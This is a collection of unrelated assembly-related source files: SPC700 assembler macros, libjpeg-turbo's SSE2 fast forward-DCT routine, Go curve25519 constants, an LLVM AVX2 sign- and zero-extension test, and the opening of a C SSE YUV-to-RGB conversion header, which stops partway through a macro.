_op_warn_default_abs
.byte op
.word val
.else
.assert 0, error, "unsupported addressing mode"
.endif
.endmacro
.define tset1 _op_abs $0E, ; abs
.define tclr1 _op_abs $4E, ; abs
.define call _op_abs $3F, ; abs
.macro jmp_ val; ****
.if .xmatch (.left (2, {val}), [!) && .xmatch (.right (3, {val}), +x])
.byte $1f
.word .mid (2, .tcount ({val})-5, {val})
.elseif DEFAULT_ABS && .xmatch (.left (1, {val}), [) && .xmatch (.right (3, {val}), +x])
_op_warn_default_abs
.byte $1f
.word .mid (1, .tcount ({val})-4, {val})
.else
_op_abs $5f, val
.endif
.endmacro
;**** $1FFF.bit
.macro _op_mbit op, val
.local @begin, @addr
@begin:
.repeat .tcount ({val}), i
.if .xmatch (.mid (i, 1, {val}), .)
@addr = .left (i, {val})
.assert 0 <= @addr && @addr <= $1FFF, error, "address exceeds 13 bits"
.byte op
.word (.right (.tcount ({val})-(i+1), {val}))*$2000 + @addr
.endif
.endrepeat
; TODO: report error during assembly rather than linking
.assert (*-@begin) = 3, error, "unsupported addressing mode"
.endmacro
.macro _op_mbit_c op, carry, val
.if .xmatch (carry, c)
_op_mbit op, val
.else
.assert 0, error, "destination must be C"
.endif
.endmacro
.macro _op_mbit_inv op, carry, val
.if .xmatch (.left (1, {val}), /)
_op_mbit_c op+$20, carry, .right (.tcount ({val})-1, {val})
.else
_op_mbit_c op, carry, val
.endif
.endmacro
.define not1 _op_mbit $EA, ; abs.bit
.define or1 _op_mbit_inv $0A, ; abs.bit
.define and1 _op_mbit_inv $4A, ; abs.bit
.define eor1 _op_mbit_inv $8A, ; abs.bit
.macro mov1 dest, src
.if .xmatch ({src}, c)
_op_mbit_c $CA, src, dest
.else
_op_mbit_c $AA, dest, src
.endif
.endmacro
;**** OP dp
.macro _op_dp op, dp
.byte op, (dp)
.endmacro
.define decw _op_dp $1a, ; dp
.define incw _op_dp $3a, ; dp
;**** OP reg
.macro _op_one_reg op, reg, err, val
.if .xmatch ({val}, reg)
.byte op
.else
.assert 0, error, err
.endif
.endmacro
.macro _op_w op, reg, val
_op_one_reg op, ya, "only supports ya", reg
.byte val
.endmacro
.define cmpw _op_w $5A, ; dp
.define addw _op_w $7A, ; dp
.define subw _op_w $9A, ; dp
.macro movw dest, src
.if .xmatch ({src}, ya)
_op_w $DA, src, dest
.else
_op_w $BA, dest, src
.endif
.endmacro
.macro div dest, src
.if .xmatch ({dest}, ya) && .xmatch ({src}, x)
.byte $9e
.else
.assert 0, error, "only supports ya, x"
.endif
.endmacro
.define xcn _op_one_reg $9f, a, "only supports a",
.define das _op_one_reg $BE, a, "only supports a",
.define daa _op_one_reg $DF, a, "only supports a",
.define mul _op_one_reg $CF, ya, "only supports ya",
;**** Unique
.macro tcall val
.assert 0 <= (val) && (val) <= 15, error, "invalid value"
.byte (val)*$10 + $01
.endmacro
.macro pcall val
.byte $4f, (val)
.endmacro
;**** Implied
.macro _op_implied op
.byte op
.endmacro
.define nop _op_implied $00
.define brk _op_implied $0f
.define clrp _op_implied $20
.define setp _op_implied $40
.define clrc _op_implied $60
.define ret _op_implied $6f
.define reti _op_implied $7f
.define setc _op_implied $80
.define ei _op_implied $A0
.define di _op_implied $C0
.define clrv _op_implied $E0
.define notc _op_implied $ED
.define sleep _op_implied $ef
.define stop _op_implied $ff
.ifndef CASPC_65XX
.define and and_
.define eor eor_
.define adc adc_
.define sbc sbc_
.define cmp cmp_
.define dec dec_
.define inc inc_
.define lsr lsr_
.define asl asl_
.define rol rol_
.define ror ror_
.define jmp jmp_
.endif
.endif;__MBSFX_SMP_Assembler__
| {
"language": "Assembly"
} |
;
; jfdctfst.asm - fast integer FDCT (64-bit SSE2)
;
; Copyright 2009 Pierre Ossman <[email protected]> for Cendio AB
; Copyright (C) 2009, 2016, D. R. Commander.
;
; Based on the x86 SIMD extension for IJG JPEG library
; Copyright (C) 1999-2006, MIYASAKA Masaru.
; For conditions of distribution and use, see copyright notice in jsimdext.inc
;
; This file should be assembled with NASM (Netwide Assembler),
; can *not* be assembled with Microsoft's MASM or any compatible
; assembler (including Borland's Turbo Assembler).
; NASM is available from http://nasm.sourceforge.net/ or
; http://sourceforge.net/project/showfiles.php?group_id=6208
;
; This file contains a fast, not so accurate integer implementation of
; the forward DCT (Discrete Cosine Transform). The following code is
; based directly on the IJG's original jfdctfst.c; see the jfdctfst.c
; for more details.
;
; [TAB8]
%include "jsimdext.inc"
%include "jdct.inc"
; --------------------------------------------------------------------------
%define CONST_BITS 8 ; 14 is also OK.
%if CONST_BITS == 8
F_0_382 equ 98 ; FIX(0.382683433)
F_0_541 equ 139 ; FIX(0.541196100)
F_0_707 equ 181 ; FIX(0.707106781)
F_1_306 equ 334 ; FIX(1.306562965)
%else
; NASM cannot do compile-time arithmetic on floating-point constants.
%define DESCALE(x, n) (((x) + (1 << ((n) - 1))) >> (n))
F_0_382 equ DESCALE( 410903207, 30 - CONST_BITS) ; FIX(0.382683433)
F_0_541 equ DESCALE( 581104887, 30 - CONST_BITS) ; FIX(0.541196100)
F_0_707 equ DESCALE( 759250124, 30 - CONST_BITS) ; FIX(0.707106781)
F_1_306 equ DESCALE(1402911301, 30 - CONST_BITS) ; FIX(1.306562965)
%endif
; --------------------------------------------------------------------------
SECTION SEG_CONST
; PRE_MULTIPLY_SCALE_BITS <= 2 (to avoid overflow)
; CONST_BITS + CONST_SHIFT + PRE_MULTIPLY_SCALE_BITS == 16 (for pmulhw)
%define PRE_MULTIPLY_SCALE_BITS 2
%define CONST_SHIFT (16 - PRE_MULTIPLY_SCALE_BITS - CONST_BITS)
alignz 32
GLOBAL_DATA(jconst_fdct_ifast_sse2)
EXTN(jconst_fdct_ifast_sse2):
PW_F0707 times 8 dw F_0_707 << CONST_SHIFT
PW_F0382 times 8 dw F_0_382 << CONST_SHIFT
PW_F0541 times 8 dw F_0_541 << CONST_SHIFT
PW_F1306 times 8 dw F_1_306 << CONST_SHIFT
alignz 32
; --------------------------------------------------------------------------
SECTION SEG_TEXT
BITS 64
;
; Perform the forward DCT on one block of samples.
;
; GLOBAL(void)
; jsimd_fdct_ifast_sse2(DCTELEM *data)
;
; r10 = DCTELEM *data
%define wk(i) rbp - (WK_NUM - (i)) * SIZEOF_XMMWORD ; xmmword wk[WK_NUM]
%define WK_NUM 2
align 32
GLOBAL_FUNCTION(jsimd_fdct_ifast_sse2)
EXTN(jsimd_fdct_ifast_sse2):
push rbp
mov rax, rsp ; rax = original rbp
sub rsp, byte 4
and rsp, byte (-SIZEOF_XMMWORD) ; align to 128 bits
mov [rsp], rax
mov rbp, rsp ; rbp = aligned rbp
lea rsp, [wk(0)]
collect_args 1
; ---- Pass 1: process rows.
mov rdx, r10 ; (DCTELEM *)
movdqa xmm0, XMMWORD [XMMBLOCK(0,0,rdx,SIZEOF_DCTELEM)]
movdqa xmm1, XMMWORD [XMMBLOCK(1,0,rdx,SIZEOF_DCTELEM)]
movdqa xmm2, XMMWORD [XMMBLOCK(2,0,rdx,SIZEOF_DCTELEM)]
movdqa xmm3, XMMWORD [XMMBLOCK(3,0,rdx,SIZEOF_DCTELEM)]
; xmm0=(00 01 02 03 04 05 06 07), xmm2=(20 21 22 23 24 25 26 27)
; xmm1=(10 11 12 13 14 15 16 17), xmm3=(30 31 32 33 34 35 36 37)
movdqa xmm4, xmm0 ; transpose coefficients(phase 1)
punpcklwd xmm0, xmm1 ; xmm0=(00 10 01 11 02 12 03 13)
punpckhwd xmm4, xmm1 ; xmm4=(04 14 05 15 06 16 07 17)
movdqa xmm5, xmm2 ; transpose coefficients(phase 1)
punpcklwd xmm2, xmm3 ; xmm2=(20 30 21 31 22 32 23 33)
punpckhwd xmm5, xmm3 ; xmm5=(24 34 25 35 26 36 27 37)
movdqa xmm6, XMMWORD [XMMBLOCK(4,0,rdx,SIZEOF_DCTELEM)]
movdqa xmm7, XMMWORD [XMMBLOCK(5,0,rdx,SIZEOF_DCTELEM)]
movdqa xmm1, XMMWORD [XMMBLOCK(6,0,rdx,SIZEOF_DCTELEM)]
movdqa xmm3, XMMWORD [XMMBLOCK(7,0,rdx,SIZEOF_DCTELEM)]
; xmm6=( 4 12 20 28 36 44 52 60), xmm1=( 6 14 22 30 38 46 54 62)
; xmm7=( 5 13 21 29 37 45 53 61), xmm3=( 7 15 23 31 39 47 55 63)
movdqa XMMWORD [wk(0)], xmm2 ; wk(0)=(20 30 21 31 22 32 23 33)
movdqa XMMWORD [wk(1)], xmm5 ; wk(1)=(24 34 25 35 26 36 27 37)
movdqa xmm2, xmm6 ; transpose coefficients(phase 1)
punpcklwd xmm6, xmm7 ; xmm6=(40 50 41 51 42 52 43 53)
punpckhwd xmm2, xmm7 ; xmm2=(44 54 45 55 46 56 47 57)
movdqa xmm5, xmm1 ; transpose coefficients(phase 1)
punpcklwd xmm1, xmm3 ; xmm1=(60 70 61 71 62 72 63 73)
punpckhwd xmm5, xmm3 ; xmm5=(64 74 65 75 66 76 67 77)
movdqa xmm7, xmm6 ; transpose coefficients(phase 2)
punpckldq xmm6, xmm1 ; xmm6=(40 50 60 70 41 51 61 71)
punpckhdq xmm7, xmm1 ; xmm7=(42 52 62 72 43 53 63 73)
movdqa xmm3, xmm2 ; transpose coefficients(phase 2)
punpckldq xmm2, xmm5 ; xmm2=(44 54 64 74 45 55 65 75)
punpckhdq xmm3, xmm5 ; xmm3=(46 56 66 76 47 57 67 77)
movdqa xmm1, XMMWORD [wk(0)] ; xmm1=(20 30 21 31 22 32 23 33)
movdqa xmm5, XMMWORD [wk(1)] ; xmm5=(24 34 25 35 26 36 27 37)
movdqa XMMWORD [wk(0)], xmm7 ; wk(0)=(42 52 62 72 43 53 63 73)
movdqa XMMWORD [wk(1)], xmm2 ; wk(1)=(44 54 64 74 45 55 65 75)
movdqa xmm7, xmm0 ; transpose coefficients(phase 2)
punpckldq xmm0, xmm1 ; xmm0=(00 10 20 30 01 11 21 31)
punpckhdq xmm7, xmm1 ; xmm7=(02 12 22 32 03 13 23 33)
movdqa xmm2, xmm4 ; transpose coefficients(phase 2)
punpckldq xmm4, xmm5 ; xmm4=(04 14 24 34 05 15 25 35)
punpckhdq xmm2, xmm5 ; xmm2=(06 16 26 36 07 17 27 37)
movdqa xmm1, xmm0 ; transpose coefficients(phase 3)
punpcklqdq xmm0, xmm6 ; xmm0=(00 10 20 30 40 50 60 70)=data0
punpckhqdq xmm1, xmm6 ; xmm1=(01 11 21 31 41 51 61 71)=data1
movdqa xmm5, xmm2 ; transpose coefficients(phase 3)
punpcklqdq xmm2, xmm3 ; xmm2=(06 16 26 36 46 56 66 76)=data6
punpckhqdq xmm5, xmm3 ; xmm5=(07 17 27 37 47 57 67 77)=data7
movdqa xmm6, xmm1
movdqa xmm3, xmm0
psubw xmm1, xmm2 ; xmm1=data1-data6=tmp6
psubw xmm0, xmm5 ; xmm0=data0-data7=tmp7
paddw xmm6, xmm2 ; xmm6=data1+data6=tmp1
paddw xmm3, xmm5 ; xmm3=data0+data7=tmp0
movdqa xmm2, XMMWORD [wk(0)] ; xmm2=(42 52 62 72 43 53 63 73)
movdqa xmm5, XMMWORD [wk(1)] ; xmm5=(44 54 64 74 45 55 65 75)
movdqa XMMWORD [wk(0)], xmm1 ; wk(0)=tmp6
movdqa XMMWORD [wk(1)], xmm0 ; wk(1)=tmp7
movdqa xmm1, xmm7 ; transpose coefficients(phase 3)
punpcklqdq xmm7, xmm2 ; xmm7=(02 12 22 32 42 52 62 72)=data2
punpckhqdq xmm1, xmm2 ; xmm1=(03 13 23 33 43 53 63 73)=data3
movdqa xmm0, xmm4 ; transpose coefficients(phase 3)
punpcklqdq xmm4, xmm5 ; xmm4=(04 14 24 34 44 54 64 74)=data4
punpckhqdq xmm0, xmm5 ; xmm0=(05 15 25 35 45 55 65 75)=data5
movdqa xmm2, xmm1
movdqa xmm5, xmm7
paddw xmm1, xmm4 ; xmm1=data3+data4=tmp3
paddw xmm7, xmm0 ; xmm7=data2+data5=tmp2
psubw xmm2, xmm4 ; xmm2=data3-data4=tmp4
psubw xmm5, xmm0 ; xmm5=data2-data5=tmp5
; -- Even part
movdqa xmm4, xmm3
movdqa xmm0, xmm6
psubw xmm3, xmm1 ; xmm3=tmp13
psubw xmm6, xmm7 ; xmm6=tmp12
paddw xmm4, xmm1 ; xmm4=tmp10
paddw xmm0, xmm7 ; xmm0=tmp11
paddw xmm6, xmm3
psllw xmm6, PRE_MULTIPLY_SCALE_BITS
pmulhw xmm6, [rel PW_F0707] ; xmm6=z1
movdqa xmm1, xmm4
movdqa xmm7, xmm3
psubw xmm4, xmm0 ; xmm4=data4
psubw xmm3, xmm6 ; xmm3=data6
paddw xmm1, xmm0 ; xmm1=data0
paddw xmm7, xmm6 ; xmm7=data2
movdqa xmm0, XMMWORD [wk(0)] ; xmm0=tmp6
movdqa xmm6, XMMWORD [wk(1)] ; xmm6=tmp7
movdqa XMMWORD [wk(0)], xmm4 ; wk(0)=data4
movdqa XMMWORD [wk(1)], xmm3 ; wk(1)=data6
; -- Odd part
paddw xmm2, xmm5 ; xmm2=tmp10
paddw xmm5, xmm0 ; xmm5=tmp11
paddw xmm0, xmm6 ; xmm0=tmp12, xmm6=tmp7
psllw xmm2, PRE_MULTIPLY_SCALE_BITS
psllw xmm0, PRE_MULTIPLY_SCALE_BITS
psllw xmm5, PRE_MULTIPLY_SCALE_BITS
pmulhw xmm5, [rel PW_F0707] ; xmm5=z3
movdqa xmm4, xmm2 ; xmm4=tmp10
psubw xmm2, xmm0
pmulhw xmm2, [rel PW_F0382] ; xmm2=z5
pmulhw xmm4, [rel PW_F0541] ; xmm4=MULTIPLY(tmp10,FIX_0_541196)
pmulhw xmm0, [rel PW_F1306] ; xmm0=MULTIPLY(tmp12,FIX_1_306562)
paddw xmm4, xmm2 ; xmm4=z2
paddw xmm0, xmm2 ; xmm0=z4
movdqa xmm3, xmm6
psubw xmm6, xmm5 ; xmm6=z13
paddw xmm3, xmm5 ; xmm3=z11
movdqa xmm2, xmm6
movdqa xmm5, xmm3
psubw xmm6, xmm4 ; xmm6=data3
psubw xmm3, xmm0 ; xmm3=data7
paddw xmm2, xmm4 ; xmm2=data5
paddw xmm5, xmm0 ; xmm5=data1
; ---- Pass 2: process columns.
; xmm1=(00 10 20 30 40 50 60 70), xmm7=(02 12 22 32 42 52 62 72)
; xmm5=(01 11 21 31 41 51 61 71), xmm6=(03 13 23 33 43 53 63 73)
movdqa xmm4, xmm1 ; transpose coefficients(phase 1)
punpcklwd xmm1, xmm5 ; xmm1=(00 01 10 11 20 21 30 31)
punpckhwd xmm4, xmm5 ; xmm4=(40 41 50 51 60 61 70 71)
movdqa xmm0, xmm7 ; transpose coefficients(phase 1)
punpcklwd xmm7, xmm6 ; xmm7=(02 03 12 13 22 23 32 33)
punpckhwd xmm0, xmm6 ; xmm0=(42 43 52 53 62 63 72 73)
movdqa xmm5, XMMWORD [wk(0)] ; xmm5=col4
movdqa xmm6, XMMWORD [wk(1)] ; xmm6=col6
; xmm5=(04 14 24 34 44 54 64 74), xmm6=(06 16 26 36 46 56 66 76)
; xmm2=(05 15 25 35 45 55 65 75), xmm3=(07 17 27 37 47 57 67 77)
movdqa XMMWORD [wk(0)], xmm7 ; wk(0)=(02 03 12 13 22 23 32 33)
movdqa XMMWORD [wk(1)], xmm0 ; wk(1)=(42 43 52 53 62 63 72 73)
movdqa xmm7, xmm5 ; transpose coefficients(phase 1)
punpcklwd xmm5, xmm2 ; xmm5=(04 05 14 15 24 25 34 35)
punpckhwd xmm7, xmm2 ; xmm7=(44 45 54 55 64 65 74 75)
movdqa xmm0, xmm6 ; transpose coefficients(phase 1)
punpcklwd xmm6, xmm3 ; xmm6=(06 07 16 17 26 27 36 37)
punpckhwd xmm0, xmm3 ; xmm0=(46 47 56 57 66 67 76 77)
movdqa xmm2, xmm5 ; transpose coefficients(phase 2)
punpckldq xmm5, xmm6 ; xmm5=(04 05 06 07 14 15 16 17)
punpckhdq xmm2, xmm6 ; xmm2=(24 25 26 27 34 35 36 37)
movdqa xmm3, xmm7 ; transpose coefficients(phase 2)
punpckldq xmm7, xmm0 ; xmm7=(44 45 46 47 54 55 56 57)
punpckhdq xmm3, xmm0 ; xmm3=(64 65 66 67 74 75 76 77)
movdqa xmm6, XMMWORD [wk(0)] ; xmm6=(02 03 12 13 22 23 32 33)
movdqa xmm0, XMMWORD [wk(1)] ; xmm0=(42 43 52 53 62 63 72 73)
movdqa XMMWORD [wk(0)], xmm2 ; wk(0)=(24 25 26 27 34 35 36 37)
movdqa XMMWORD [wk(1)], xmm7 ; wk(1)=(44 45 46 47 54 55 56 57)
movdqa xmm2, xmm1 ; transpose coefficients(phase 2)
punpckldq xmm1, xmm6 ; xmm1=(00 01 02 03 10 11 12 13)
punpckhdq xmm2, xmm6 ; xmm2=(20 21 22 23 30 31 32 33)
movdqa xmm7, xmm4 ; transpose coefficients(phase 2)
punpckldq xmm4, xmm0 ; xmm4=(40 41 42 43 50 51 52 53)
punpckhdq xmm7, xmm0 ; xmm7=(60 61 62 63 70 71 72 73)
movdqa xmm6, xmm1 ; transpose coefficients(phase 3)
punpcklqdq xmm1, xmm5 ; xmm1=(00 01 02 03 04 05 06 07)=data0
punpckhqdq xmm6, xmm5 ; xmm6=(10 11 12 13 14 15 16 17)=data1
movdqa xmm0, xmm7 ; transpose coefficients(phase 3)
punpcklqdq xmm7, xmm3 ; xmm7=(60 61 62 63 64 65 66 67)=data6
punpckhqdq xmm0, xmm3 ; xmm0=(70 71 72 73 74 75 76 77)=data7
movdqa xmm5, xmm6
movdqa xmm3, xmm1
psubw xmm6, xmm7 ; xmm6=data1-data6=tmp6
psubw xmm1, xmm0 ; xmm1=data0-data7=tmp7
paddw xmm5, xmm7 ; xmm5=data1+data6=tmp1
paddw xmm3, xmm0 ; xmm3=data0+data7=tmp0
movdqa xmm7, XMMWORD [wk(0)] ; xmm7=(24 25 26 27 34 35 36 37)
movdqa xmm0, XMMWORD [wk(1)] ; xmm0=(44 45 46 47 54 55 56 57)
movdqa XMMWORD [wk(0)], xmm6 ; wk(0)=tmp6
movdqa XMMWORD [wk(1)], xmm1 ; wk(1)=tmp7
movdqa xmm6, xmm2 ; transpose coefficients(phase 3)
punpcklqdq xmm2, xmm7 ; xmm2=(20 21 22 23 24 25 26 27)=data2
punpckhqdq xmm6, xmm7 ; xmm6=(30 31 32 33 34 35 36 37)=data3
movdqa xmm1, xmm4 ; transpose coefficients(phase 3)
punpcklqdq xmm4, xmm0 ; xmm4=(40 41 42 43 44 45 46 47)=data4
punpckhqdq xmm1, xmm0 ; xmm1=(50 51 52 53 54 55 56 57)=data5
movdqa xmm7, xmm6
movdqa xmm0, xmm2
paddw xmm6, xmm4 ; xmm6=data3+data4=tmp3
paddw xmm2, xmm1 ; xmm2=data2+data5=tmp2
psubw xmm7, xmm4 ; xmm7=data3-data4=tmp4
psubw xmm0, xmm1 ; xmm0=data2-data5=tmp5
; -- Even part
movdqa xmm4, xmm3
movdqa xmm1, xmm5
psubw xmm3, xmm6 ; xmm3=tmp13
psubw xmm5, xmm2 ; xmm5=tmp12
paddw xmm4, xmm6 ; xmm4=tmp10
paddw xmm1, xmm2 ; xmm1=tmp11
paddw xmm5, xmm3
psllw xmm5, PRE_MULTIPLY_SCALE_BITS
pmulhw xmm5, [rel PW_F0707] ; xmm5=z1
movdqa xmm6, xmm4
movdqa xmm2, xmm3
psubw xmm4, xmm1 ; xmm4=data4
psubw xmm3, xmm5 ; xmm3=data6
paddw xmm6, xmm1 ; xmm6=data0
paddw xmm2, xmm5 ; xmm2=data2
movdqa XMMWORD [XMMBLOCK(4,0,rdx,SIZEOF_DCTELEM)], xmm4
movdqa XMMWORD [XMMBLOCK(6,0,rdx,SIZEOF_DCTELEM)], xmm3
movdqa XMMWORD [XMMBLOCK(0,0,rdx,SIZEOF_DCTELEM)], xmm6
movdqa XMMWORD [XMMBLOCK(2,0,rdx,SIZEOF_DCTELEM)], xmm2
; -- Odd part
movdqa xmm1, XMMWORD [wk(0)] ; xmm1=tmp6
movdqa xmm5, XMMWORD [wk(1)] ; xmm5=tmp7
paddw xmm7, xmm0 ; xmm7=tmp10
paddw xmm0, xmm1 ; xmm0=tmp11
paddw xmm1, xmm5 ; xmm1=tmp12, xmm5=tmp7
psllw xmm7, PRE_MULTIPLY_SCALE_BITS
psllw xmm1, PRE_MULTIPLY_SCALE_BITS
psllw xmm0, PRE_MULTIPLY_SCALE_BITS
pmulhw xmm0, [rel PW_F0707] ; xmm0=z3
movdqa xmm4, xmm7 ; xmm4=tmp10
psubw xmm7, xmm1
pmulhw xmm7, [rel PW_F0382] ; xmm7=z5
pmulhw xmm4, [rel PW_F0541] ; xmm4=MULTIPLY(tmp10,FIX_0_541196)
pmulhw xmm1, [rel PW_F1306] ; xmm1=MULTIPLY(tmp12,FIX_1_306562)
paddw xmm4, xmm7 ; xmm4=z2
paddw xmm1, xmm7 ; xmm1=z4
movdqa xmm3, xmm5
psubw xmm5, xmm0 ; xmm5=z13
paddw xmm3, xmm0 ; xmm3=z11
movdqa xmm6, xmm5
movdqa xmm2, xmm3
psubw xmm5, xmm4 ; xmm5=data3
psubw xmm3, xmm1 ; xmm3=data7
paddw xmm6, xmm4 ; xmm6=data5
paddw xmm2, xmm1 ; xmm2=data1
movdqa XMMWORD [XMMBLOCK(3,0,rdx,SIZEOF_DCTELEM)], xmm5
movdqa XMMWORD [XMMBLOCK(7,0,rdx,SIZEOF_DCTELEM)], xmm3
movdqa XMMWORD [XMMBLOCK(5,0,rdx,SIZEOF_DCTELEM)], xmm6
movdqa XMMWORD [XMMBLOCK(1,0,rdx,SIZEOF_DCTELEM)], xmm2
uncollect_args 1
mov rsp, rbp ; rsp <- aligned rbp
pop rsp ; rsp <- original rbp
pop rbp
ret
; For some reason, the OS X linker does not honor the request to align the
; segment unless we do this.
align 32
| {
"language": "Assembly"
} |
// Copyright 2012 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// This code was translated into a form compatible with 6a from the public
// domain sources in SUPERCOP: https://bench.cr.yp.to/supercop.html
// +build amd64,!gccgo,!appengine
// These constants cannot be encoded in non-MOVQ immediates.
// We access them directly from memory instead.
DATA ·_121666_213(SB)/8, $996687872
GLOBL ·_121666_213(SB), 8, $8
DATA ·_2P0(SB)/8, $0xFFFFFFFFFFFDA
GLOBL ·_2P0(SB), 8, $8
DATA ·_2P1234(SB)/8, $0xFFFFFFFFFFFFE
GLOBL ·_2P1234(SB), 8, $8
| {
"language": "Assembly"
} |
; RUN: llc < %s -mtriple=x86_64-apple-darwin -mcpu=x86-64 -mattr=+avx2 | FileCheck %s
define <16 x i16> @test_lvm_x86_avx2_pmovsxbw(<16 x i8>* %a) {
; CHECK-LABEL: test_lvm_x86_avx2_pmovsxbw
; CHECK: vpmovsxbw (%rdi), %ymm0
%1 = load <16 x i8>* %a, align 1
%2 = call <16 x i16> @llvm.x86.avx2.pmovsxbw(<16 x i8> %1)
ret <16 x i16> %2
}
define <8 x i32> @test_llvm_x86_avx2_pmovsxbd(<16 x i8>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovsxbd
; CHECK: vpmovsxbd (%rdi), %ymm0
%1 = load <16 x i8>* %a, align 1
%2 = call <8 x i32> @llvm.x86.avx2.pmovsxbd(<16 x i8> %1)
ret <8 x i32> %2
}
define <4 x i64> @test_llvm_x86_avx2_pmovsxbq(<16 x i8>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovsxbq
; CHECK: vpmovsxbq (%rdi), %ymm0
%1 = load <16 x i8>* %a, align 1
%2 = call <4 x i64> @llvm.x86.avx2.pmovsxbq(<16 x i8> %1)
ret <4 x i64> %2
}
define <8 x i32> @test_llvm_x86_avx2_pmovsxwd(<8 x i16>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovsxwd
; CHECK: vpmovsxwd (%rdi), %ymm0
%1 = load <8 x i16>* %a, align 1
%2 = call <8 x i32> @llvm.x86.avx2.pmovsxwd(<8 x i16> %1)
ret <8 x i32> %2
}
define <4 x i64> @test_llvm_x86_avx2_pmovsxwq(<8 x i16>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovsxwq
; CHECK: vpmovsxwq (%rdi), %ymm0
%1 = load <8 x i16>* %a, align 1
%2 = call <4 x i64> @llvm.x86.avx2.pmovsxwq(<8 x i16> %1)
ret <4 x i64> %2
}
define <4 x i64> @test_llvm_x86_avx2_pmovsxdq(<4 x i32>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovsxdq
; CHECK: vpmovsxdq (%rdi), %ymm0
%1 = load <4 x i32>* %a, align 1
%2 = call <4 x i64> @llvm.x86.avx2.pmovsxdq(<4 x i32> %1)
ret <4 x i64> %2
}
define <16 x i16> @test_lvm_x86_avx2_pmovzxbw(<16 x i8>* %a) {
; CHECK-LABEL: test_lvm_x86_avx2_pmovzxbw
; CHECK: vpmovzxbw (%rdi), %ymm0
%1 = load <16 x i8>* %a, align 1
%2 = call <16 x i16> @llvm.x86.avx2.pmovzxbw(<16 x i8> %1)
ret <16 x i16> %2
}
define <8 x i32> @test_llvm_x86_avx2_pmovzxbd(<16 x i8>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovzxbd
; CHECK: vpmovzxbd (%rdi), %ymm0
%1 = load <16 x i8>* %a, align 1
%2 = call <8 x i32> @llvm.x86.avx2.pmovzxbd(<16 x i8> %1)
ret <8 x i32> %2
}
define <4 x i64> @test_llvm_x86_avx2_pmovzxbq(<16 x i8>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovzxbq
; CHECK: vpmovzxbq (%rdi), %ymm0
%1 = load <16 x i8>* %a, align 1
%2 = call <4 x i64> @llvm.x86.avx2.pmovzxbq(<16 x i8> %1)
ret <4 x i64> %2
}
define <8 x i32> @test_llvm_x86_avx2_pmovzxwd(<8 x i16>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovzxwd
; CHECK: vpmovzxwd (%rdi), %ymm0
%1 = load <8 x i16>* %a, align 1
%2 = call <8 x i32> @llvm.x86.avx2.pmovzxwd(<8 x i16> %1)
ret <8 x i32> %2
}
define <4 x i64> @test_llvm_x86_avx2_pmovzxwq(<8 x i16>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovzxwq
; CHECK: vpmovzxwq (%rdi), %ymm0
%1 = load <8 x i16>* %a, align 1
%2 = call <4 x i64> @llvm.x86.avx2.pmovzxwq(<8 x i16> %1)
ret <4 x i64> %2
}
define <4 x i64> @test_llvm_x86_avx2_pmovzxdq(<4 x i32>* %a) {
; CHECK-LABEL: test_llvm_x86_avx2_pmovzxdq
; CHECK: vpmovzxdq (%rdi), %ymm0
%1 = load <4 x i32>* %a, align 1
%2 = call <4 x i64> @llvm.x86.avx2.pmovzxdq(<4 x i32> %1)
ret <4 x i64> %2
}
declare <4 x i64> @llvm.x86.avx2.pmovzxdq(<4 x i32>)
declare <4 x i64> @llvm.x86.avx2.pmovzxwq(<8 x i16>)
declare <8 x i32> @llvm.x86.avx2.pmovzxwd(<8 x i16>)
declare <4 x i64> @llvm.x86.avx2.pmovzxbq(<16 x i8>)
declare <8 x i32> @llvm.x86.avx2.pmovzxbd(<16 x i8>)
declare <16 x i16> @llvm.x86.avx2.pmovzxbw(<16 x i8>)
declare <4 x i64> @llvm.x86.avx2.pmovsxdq(<4 x i32>)
declare <4 x i64> @llvm.x86.avx2.pmovsxwq(<8 x i16>)
declare <8 x i32> @llvm.x86.avx2.pmovsxwd(<8 x i16>)
declare <4 x i64> @llvm.x86.avx2.pmovsxbq(<16 x i8>)
declare <8 x i32> @llvm.x86.avx2.pmovsxbd(<16 x i8>)
declare <16 x i16> @llvm.x86.avx2.pmovsxbw(<16 x i8>)
| {
"language": "Assembly"
} |
// Copyright 2016 Adrien Descamps
// Distributed under BSD 3-Clause License
/* You need to define the following macros before including this file:
SSE_FUNCTION_NAME
STD_FUNCTION_NAME
YUV_FORMAT
RGB_FORMAT
*/
/* You may define the following macro, which affects generated code:
SSE_ALIGNED
*/
#ifdef SSE_ALIGNED
/* Unaligned instructions seem faster, even on aligned data? */
/*
#define LOAD_SI128 _mm_load_si128
#define SAVE_SI128 _mm_stream_si128
*/
#define LOAD_SI128 _mm_loadu_si128
#define SAVE_SI128 _mm_storeu_si128
#else
#define LOAD_SI128 _mm_loadu_si128
#define SAVE_SI128 _mm_storeu_si128
#endif
#define UV2RGB_16(U,V,R1,G1,B1,R2,G2,B2) \
r_tmp = _mm_mullo_epi16(V, _mm_set1_epi16(param->v_r_factor)); \
g_tmp = _mm_add_epi16( \
_mm_mullo_epi16(U, _mm_set1_epi16(param->u_g_factor)), \
_mm_mullo_epi16(V, _mm_set1_epi16(param->v_g_factor))); \
b_tmp = _mm_mullo_epi16(U, _mm_set1_epi16(param->u_b_factor)); \
R1 = _mm_unpacklo_epi16(r_tmp, r_tmp); \
G1 = _mm_unpacklo_epi16(g_tmp, g_tmp); \
B1 = _mm_unpacklo_epi16(b_tmp, b_tmp); \
R2 = _mm_unpackhi_epi16(r_tmp, r_tmp); \
G2 = _mm_unpackhi_epi16(g_tmp, g_tmp); \
B2 = _mm_unpackhi_epi16(b_tmp, b_tmp); \
#define ADD_Y2RGB_16(Y1,Y2,R1,G1,B1,R2,G2,B2) \
Y1 = _mm_mullo_epi16(_mm_sub_epi16(Y1, _mm_set1_epi16(param->y_shift)), _mm_set1_epi16(param->y_factor)); \
Y2 = _mm_mullo_epi16(_mm_sub_epi16(Y2, _mm_set1_epi16(param->y_shift)), _mm_set1_epi16(param->y_factor)); \
\
R1 = _mm_srai_epi16(_mm_add_epi16(R1, Y1), PRECISION); \
